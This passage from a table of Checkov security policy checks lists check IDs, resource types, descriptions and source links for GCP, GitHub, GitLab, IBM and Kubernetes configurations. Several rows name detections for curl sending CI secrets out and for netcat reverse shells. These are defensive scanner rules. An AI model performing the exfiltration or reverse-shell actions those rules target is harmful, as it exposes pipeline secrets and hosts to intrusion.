[CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | -| 2334 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | -| 2335 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | -| 2336 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | -| 2337 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | -| 2338 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | -| 2339 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | -| 2340 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | -| 2341 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | -| 2342 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | -| 2343 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | -| 2344 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | -| 2345 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | -| 2346 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | -| 2347 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | -| 2348 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | -| 2349 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | -| 2350 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | -| 2351 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | -| 2352 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | -| 2353 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | -| 2354 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | -| 2355 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) | -| 2356 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) | -| 2357 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) | -| 2358 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) | -| 2359 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) | -| 2360 | CKV_GHA_1 | jobs | jobs | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) | -| 2361 | CKV_GHA_1 | jobs | jobs.*.steps[] | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) | -| 2362 | CKV_GHA_2 | jobs | jobs | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) | -| 2363 | CKV_GHA_2 | jobs | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) | -| 2364 | CKV_GHA_3 | jobs | jobs | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) | -| 2365 | CKV_GHA_3 | jobs | jobs.*.steps[] | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) | -| 2366 | CKV_GHA_4 | jobs | jobs | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) | -| 2367 | CKV_GHA_4 | jobs | jobs.*.steps[] | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) | -| 2368 | CKV_GHA_5 | jobs | jobs | Found artifact build without evidence of cosign sign execution in pipeline | github_actions | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py) | -| 2369 | CKV_GHA_6 | jobs | jobs | Found artifact build without evidence of cosign sbom attestation in pipeline | github_actions | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py) | -| 2370 | CKV_GHA_7 | jobs | on | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty. | github_actions | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py) | -| 2371 | CKV2_GHA_1 | resource | permissions | Ensure top-level permissions are not set to write-all | github_actions | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml) | -| 2372 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | -| 2373 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | -| 2374 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | -| 2375 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 2376 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 2377 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | -| 2378 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 2379 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | -| 2380 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 2381 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | -| 2382 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | -| 2383 | CKV_GITHUB_1 | github_configuration | * | Ensure GitHub organization security settings require 2FA | github_configuration | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py) | -| 2384 | CKV_GITHUB_2 | github_configuration | * | Ensure GitHub organization security settings require SSO | github_configuration | [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py) | -| 2385 | CKV_GITHUB_3 | github_configuration | * | Ensure GitHub organization security settings has IP allow list enabled | github_configuration | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py) | -| 2386 | CKV_GITHUB_4 | github_configuration | * | Ensure GitHub branch protection rules requires signed commits | github_configuration | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py) | -| 2387 | CKV_GITHUB_5 | github_configuration | * | Ensure GitHub branch protection rules does not allow force pushes | github_configuration | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py) | -| 2388 | CKV_GITHUB_6 | github_configuration | * | Ensure GitHub organization webhooks are using HTTPS | github_configuration | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py) | -| 2389 | CKV_GITHUB_7 | github_configuration | * | Ensure GitHub repository webhooks are using HTTPS | github_configuration | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py) | -| 2390 | CKV_GITHUB_8 | github_configuration | * | Ensure GitHub branch protection rules requires linear history | github_configuration | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py) | -| 2391 | CKV_GITHUB_9 | github_configuration | * | Ensure 2 admins are set for each repository | github_configuration | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py) | -| 2392 | CKV_GITHUB_10 | github_configuration | * | Ensure branch protection rules are enforced on administrators | github_configuration | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py) | -| 2393 | CKV_GITHUB_11 | github_configuration | * | Ensure GitHub branch protection dismisses stale review on new commit | github_configuration | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py) | -| 2394 | CKV_GITHUB_12 | github_configuration | * | Ensure GitHub branch protection restricts who can dismiss PR reviews | github_configuration | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py) | -| 2395 | CKV_GITHUB_13 | github_configuration | * | Ensure GitHub branch protection requires CODEOWNER reviews | github_configuration | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py) | -| 2396 | CKV_GITHUB_14 | github_configuration | * | Ensure all checks have passed before the merge of new code | github_configuration | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py) | -| 2397 | CKV_GITHUB_15 | github_configuration | * | Ensure inactive branches are reviewed and removed periodically | github_configuration | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py) | -| 2398 | CKV_GITHUB_16 | github_configuration | * | Ensure GitHub branch protection requires conversation resolution | github_configuration | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py) | -| 2399 | CKV_GITHUB_17 | github_configuration | * | Ensure GitHub branch protection requires push restrictions | github_configuration | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py) | -| 2400 | CKV_GITHUB_18 | github_configuration | * | Ensure GitHub branch protection rules does not allow deletions | github_configuration | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py) | -| 2401 | CKV_GITHUB_19 | github_configuration | * | Ensure any change to code receives approval of two strongly authenticated users | github_configuration | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py) | -| 2402 | CKV_GITHUB_20 | github_configuration | * | Ensure open git branches are up to date before they can be merged into codebase | github_configuration | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py) | -| 2403 | CKV_GITHUB_21 | github_configuration | * | Ensure public repository creation is limited to specific members | github_configuration | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py) | -| 2404 | CKV_GITHUB_22 | github_configuration | * | Ensure private repository creation is limited to specific members | github_configuration | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py) | -| 2405 | CKV_GITHUB_23 | github_configuration | * | Ensure internal repository creation is limited to specific members | github_configuration | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py) | -| 2406 | CKV_GITHUB_26 | github_configuration | * | Ensure minimum admins are set for the organization | github_configuration | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py) | -| 2407 | CKV_GITHUB_27 | github_configuration | * | Ensure strict base permissions are set for repositories | github_configuration | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py) | -| 2408 | CKV_GITHUB_28 | github_configuration | * | Ensure an organization's identity is confirmed with a Verified badge Passed | github_configuration | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py) | -| 2409 | CKV_GITLAB_1 | gitlab_configuration | * | Merge requests should require at least 2 approvals | gitlab_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py) | -| 2410 | CKV_GITLAB_2 | gitlab_configuration | * | Ensure all Gitlab groups require two factor authentication | gitlab_configuration | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py) | -| 2411 | CKV_GITLABCI_1 | jobs | *.script[] | Suspicious use of curl with CI environment variables in script | gitlab_ci | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py) | -| 2412 | CKV_GITLABCI_2 | jobs | *.rules | Avoid creating rules that generate double pipelines | gitlab_ci | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py) | -| 2413 | CKV_GITLABCI_3 | jobs | *.image[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | -| 2414 | CKV_GITLABCI_3 | jobs | *.services[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | -| 2415 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | -| 2416 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | -| 2417 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | -| 2418 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | -| 2419 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | -| 2420 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | -| 2421 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | -| 2422 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | -| 2423 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | -| 2424 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | -| 2425 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | -| 2426 | CKV_K8S_1 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host process ID namespace | Kubernetes | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py) | -| 2427 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | -| 2428 | CKV_K8S_2 | resource | PodSecurityPolicy | Do not admit privileged containers | Kubernetes | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py) | -| 2429 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | -| 2430 | CKV_K8S_3 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host IPC namespace | Kubernetes | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py) | -| 2431 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | -| 2432 | CKV_K8S_4 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host network namespace | Kubernetes | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py) | -| 2433 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | -| 2434 | CKV_K8S_5 | resource | PodSecurityPolicy | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py) | -| 2435 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | -| 2436 | CKV_K8S_6 | resource | PodSecurityPolicy | Do not admit root containers | Kubernetes | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py) | -| 2437 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | -| 2438 | CKV_K8S_7 | resource | PodSecurityPolicy | Do not admit containers with the NET_RAW capability | Kubernetes | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py) | -| 2439 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | -| 2440 | CKV_K8S_8 | resource | DaemonSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2441 | CKV_K8S_8 | resource | Deployment | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2442 | CKV_K8S_8 | resource | DeploymentConfig | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2443 | CKV_K8S_8 | resource | Pod | Liveness Probe Should be Configured | Kubernetes | 